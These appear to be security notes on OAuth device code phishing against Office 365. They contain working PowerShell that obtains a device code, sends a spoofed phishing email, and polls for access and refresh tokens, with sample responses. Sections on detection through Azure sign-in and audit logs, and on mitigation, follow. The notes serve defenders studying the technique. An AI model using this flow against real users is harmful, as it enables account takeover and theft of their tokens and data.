Device code authentication abuse

What Is Device Code Authentication?

Introducing a new phishing technique for compromising Office 365 accountsaadinternals.com

OAuth 2.0 device authorization grant - Microsoft identity platformMicrosoftLearn

allows users to sign in to input-constrained devices such as a smart TV, IoT device, or printer. To enable this flow, the device has the user visit a webpage in their browser on another device to sign in. Once the user signs in, the device is able to get access tokens and refresh tokens as needed.

1. An attacker connects to /devicecode endpoint and sends client_id and resource

2. After receiving verification_uri and user_code, create an email containing a link to verification_uri and user_code, and send it to the victim.

3. Victim clicks the link, provides the code and completes the sign in.

4. The attacker receives access_token and refresh_token and can now mimic the victim.

List of Client IDs

Verify first-party Microsoft applications in sign-in reportsMicrosoftLearn

Access tokens are stored for different Client IDs in Azure.

Attack

1. Send POST request to oauth2/devicecode to retreive

   1. User Code

   2. Device code string

   3. Time code expires in

# Create a body, we'll be using client id of "Microsoft Office"

$body=@{
	"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
	"resource" =  "https://graph.windows.net"
}

# Invoke the request to get device and user codes

$authResponse = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" -Body $body
$user_code =    $authResponse.user_code

1. Send user email with the code and a link to "DeviceLogin" to enter the code

   1. https://microsoft.com/devicelogin

# Create a message

$message = @"
<html>
Hi!<br>
Here is the link to the <a href="https://microsoft.com/devicelogin">document</a>. Use the following code to access: <b>$user_code</b>. <br><br>
</html>
"@

# Send the email

Send-MailMessage -from "Don Director <dond@something.com>" -to "william.victim@target.org" -Subject "Don shared a document with you" -Body $message -SmtpServer $SMTPServer -BodyAsHtml 

1. Retrieving the access tokens

Attacker needs to make an http POST to Azure AD token endpoint every 5 seconds:

 https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0

The request must include the following parameters (code is the device_code from the step 1)

Parameter	Value
client_id	d3590ed6-52b3-4102-aeff-aad2292ab01c
resource	https://graph.windows.net
device_code	CAQABAAEAAAB2UyzwtQEKR7-rWbgdcBZIGm0IlLxBn23EWIrgw7fkNIKyMdS2xoEg9QAntABbI5ILrinFM2ze8dVKdixlThVWfM8ZPhq9p7uN8tYIuMkfVJ29aUnUBTFsYCmJCsZHkIxtmwdCsIlKpOQij2lJZzphfZX8j0nktDpaHVB0zm-vqATogllBjA-t_ZM2B0cgcjQgAA
grant_type	urn:ietf:params:oauth:grant-type:device_code

If the authentication is pending, an http error 400 Bad Request is returned with the following content:

{
	"error": "authorization_pending",
	"error_description": "AADSTS70016: OAuth 2.0 device flow error. Authorization is pending. Continue polling.\r\nTrace ID: b35f261e-93cd-473b-9cf9-b81f30800600\r\nCorrelation ID: 8ee0ae8a-533f-4742-8334-e9ed939b083d\r\nTimestamp: 2020-10-14 06:06:07Z",
	"error_codes": [70016],
	"timestamp": "2020-10-13 18:06:07Z",
	"trace_id": "b35f261e-93cd-473b-9cf9-b81f30800600",
	"correlation_id": "8ee0ae8a-533f-4742-8334-e9ed939b083d",
	"error_uri": "https://login.microsoftonline.com/error?code=70016"
}

After successful login, we’ll get the following response (tokens truncated):

{
	"token_type": "Bearer",
	"scope": "user_impersonation",
	"expires_in": "7199",
	"ext_expires_in": "7199",
	"expires_on": "1602662787",
	"not_before": "1602655287",
	"resource": "https://graph.windows.net",
	"access_token": "eyJ0eXAi...HQOT1rvUEOEHLeQ",
	"refresh_token": "0.AAAAxkwD...WxPoK0Iq6W",
	"foci": "1",
	"id_token": "eyJ0eXAi...widmVyIjoiMS4wIn0."
}

Detect

How to Detect Malicious OAuth Device Code Phishingwww.inversecos.com

Difficult to detect without browser forensics to look for navigation to https://microsoft.com/devicelogin website.

What logs are available?

• Sign-In logs

• UAL logs

Sign-In Logs:

Azure Sign-Ins will show two simultaneous entries, focus on identifying device code authentication usage.

• Interactive sign-in (attacker)

• Non-interactive sign-in (for when attacker accessed resource using stolen oauth token).

What will Interactive Sign-In logs show?

• Shows device code authentication was used.

• Logon is token based, therefore single factor is used.

• The TA is using it to gain access to GraphAPI (or what other resource they accessed).

• Malicious IP

• Client App: Mobile Apps and Desktop clients

• User Agent.

• Authentication Protocol: Device Code.

• Resource ID: What resource TA requested (i.e. Graph).

A success and failure log will trigger within 10 seconds of each other for a successful devicelogin.

What will Non-Interactive Sign-In logs show?

Non-Interactive sign-ins will show how the TA interacted with the access token after gaining access to it.

• User Agent (anomalies could be curl, python, powershell, etc).

• Malicious IP

• Client App: Mobile Apps and Desktop clients.

What will UAL logs show?

Located in M365 Defender Portal: https://security.microsoft.com/

• Attacker IP triggering "User Logged In" for every operation they perform with stolen token.

• ExtemdedProperties Request Type: CMSI

  • CMSI: Check my Sign-In (triggered when platform requires user to validate request, i.e. user gives consent to application).

• Item: Microsoft Graph (resource TA request).

• Application ID: The client ID the TA is pretending to be (i.e. Microsoft Office).

Mitigate

Not a lot of ways to prevent this abuse.

• Implement location based Conditional Access Policies.

• Control how a user is allowed to log in to their account.